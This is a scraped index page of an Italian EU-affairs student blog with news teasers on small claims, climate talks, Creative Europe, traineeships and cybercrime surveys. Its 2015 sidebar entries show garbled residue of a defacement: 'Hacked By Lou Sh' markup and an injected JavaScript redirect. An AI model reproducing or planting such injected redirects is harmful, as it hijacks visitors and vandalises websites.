EUROSBLOGS
--> Giugno 2013 Maggio 2013 Aprile 2013 Marzo 2013 Febbraio 2013 Gennaio 2013
Dicembre 2012 Novembre 2012 Ottobre 2012 Settembre 2012 Agosto 2012 Luglio 2012 Giugno 2012 Maggio 2012 Aprile 2012 Marzo 2012 February 2012 Gennaio 2012
Dicembre 2011 Novembre 2011 Ottobre 2011 Settembre 2011 Agosto 2011 Luglio 2011 Giugno 2011 Maggio 2011 Aprile 2011 Marzo 2011 Febbraio 2011 Gennaio 2011
Dicembre 2010 Novembre 2010 Ottobre 2010 Settembre 2010 Luglio 2010 Giugno 2010 Aprile 2010 Marzo 2010 Febbraio 2010
Dicembre 2013
it

Le controversie di modesta entità sono i procedimenti giudiziali il cui valore è fissato, da un precedente regolamento europeo (il regolamento n. 861/2007) a massimo 2000 euro, che coinvolgono cittadini di due Stati membri diversi, che hanno bisogno di un modo rapido e poco costoso di giungere alla soluzione della loro lite.

L’esempio che la Commissione ha in mente è questo: fornire una strada “cheap” per coloro che vorrebbero indietro il proprio denaro dopo aver acquistato un televisore online da un venditore straniero, ma non averlo mai ricevuto. Quasi nessuno, in tempi di crisi, si imbarcherebbe in una causa da (...)

it

Sembra che le decisioni diplomatiche internazionali siano più lente dei cambiamenti climatici. Sedici COP dopo la terza, la storica Conferenza di Kyoto, esperti, tecnici, diplomatici e politici da tutto il mondo si sono riuniti a Varsavia per discutere di riscaldamento globale. Nessun accordo rilevante è stato raggiunto. Tutti sanno però quando e dove rivedersi per la ventesima Conferenza sul clima.

Nella storia della diplomazia internazionale, piena di summit e incontri nati con i migliori auspici, spesso accade che le buone intenzioni si trasformino, di fatto, in grandi delusioni. La storia del Protocollo di Kyoto, i cui esiti sono inferiori alle aspettative, non è un’eccezione. Kyoto, (...)

it

Il 19 novembre 2013, a Strasburgo, il Parlamento europeo ha dato il proprio consenso al programma della Commissione europea “Europa Creativa”, che prevede il supporto a molti settori della cultura europea quali cinema, televisione, musica, letteratura, arti dello spettacolo. Questo per poter favorire l’impiego sia in settori che riguardano la cultura sia in quelli che fanno riferimento alla creatività.

Per ciò che riguarda le stime per il futuro, si calcola una crescita di circa il 9% rispetto ad ora ed un bilancio che tra 7 anni si accrescerà fino a toccare punte di 1,46 miliardi di euro. Un elemento che si deve porre in rilievo è quello di un più facile accesso per le piccole imprese, per (...)

it

Entrare nel mondo del lavoro non è certo una cosa semplice al giorno d’oggi. L’Europa lo sa bene ed è per questo che ha deciso di intervenire, andando a regolamentare il settore dei tirocini. Un’offerta chiara e una formazione valida in grado di fornire le competenze utili per un futuro impiego: ecco la proposta della Commissione europea.

In un momento di profonda crisi per il mondo del lavoro e per il settore economico, dove la malinconia e lo scetticismo sembrano farla da padrona, un piccolo raggio di luce appare all’orizzonte per noi giovani. L’Unione Europea infatti non si smentisce mai e rilancia il suo impegno per assicurare (...)

it

Il 22 novembre è stato pubblicato a Bruxelles un Eurobarometro che evidenzia come i navigatori del web siano sempre più turbati riguardo il crimine informatico. Le operazioni economiche, i dati personali, le proprie credenziali sui vari siti web: le persone sono sicure quando navigano online? Le risposte sono controverse, ma osservando i dati si osserva che gli europei sono sempre più titubanti a effettuare operazioni "rischiose" sul web.

Il sondaggio Eurobarometro ha coinvolto circa ventisettemila persone, delle quali circa il 76% ha paura di cadere vittima di imbrogli online. Durante l’anno passato era stata svolta un’indagine simile, la quale aveva sempre mostrato risultanti negativi, ma in tono sicuramente minore in termini (...)

it

Basta osservare, anche solo di sfuggita, le facce stralunate dei turisti stranieri che chiedono informazioni per le strade italiane, per capire che noi italiani non siamo particolarmente a nostro agio con l’inglese. Non è raro, infatti, che i poveri malcapitati si trovino di fronte a novelli Totò e Peppino che gli rispondono alla “Noio volevom savuar”.

È la lingua del business, della tecnologia e delle scienze, la lingua “franca” con cui il mondo comunica: eppure gli italiani l’inglese non riescono proprio a padroneggiarlo. A dirlo è un’importante ricerca realizzata da Education First, scuola internazionale di inglese, condotta nel corso di 6 anni, (...)

it

L’AESA, Agenzia europea per la sicurezza aerea, ha presentato delle disposizioni aggiornate in merito all’impiego di dispositivi elettronici a bordo degli aerei. Tablet, lettori di libri elettronici e smartphone potranno essere tenuti in funzione attraverso la modalità “offline”, ovvero con connessione disabilitata, per tutte le fasi del volo (rullaggio, decollo, atterraggio) senza destare problemi a livello di sicurezza.

Le nuove disposizioni: le nuove disposizioni interessano i vari dispositivi elettronici mobili che sono in modalità “offline”, detta anche “modalità volo”. La novità si applica ai dispositivi elettronici e fa riferimento a tutte le fasi del volo, dall’imbarco allo sbarco. Va detto che in precedenza i (...)

Dialogo con i cittadini sul Futuro dell’Europa

L’Eurosblog è media partner dell’iniziativa "Dialogo con i cittadini sul Futuro dell’Europa" organizzata dalla Rappresentanza in Italia della Commissione europea. Una serie di dibattiti aperti tra la Commissione europea e i cittadini sui temi dell’occupazione, della protezione dei cittadini e della sostenibilità. L’obiettivo è rispondere insieme alla domanda: “Che Europa vogliamo nel futuro?”. Guarda il video viral e fai la tua domanda su Twitter, utilizzando l’hashtag #EUdeb8. Segui l’evento in streaming su http://webcast.ec.europa.eu/eutv/po...

Quale Europa vogliamo nel futuro?


Ultimo commento

Erasmus+: il nuovo programma di studio per i giovani in Europa
di réduction toysrus, le 21 agosto 2013

Nice article :). I’ve studied abroad in Espagna y eso fue una experiencia unica: tanto al nivel laboral como humano! Je recommande ça à tout le monde :)


comitato



Ultimi articoli del blog

<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/cc82855323b3141664fde5d9afad6d5c.png">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
15 marzo 2015
<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/646bc521095d5a61646327c7b727a862.jpg">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
17 febbraio 2015



© Groupe Euros du Village 2010 | Note legali | Sito realizzato con SPIP | Relizzazione tecnica e design : Media Animation & Euros du Village France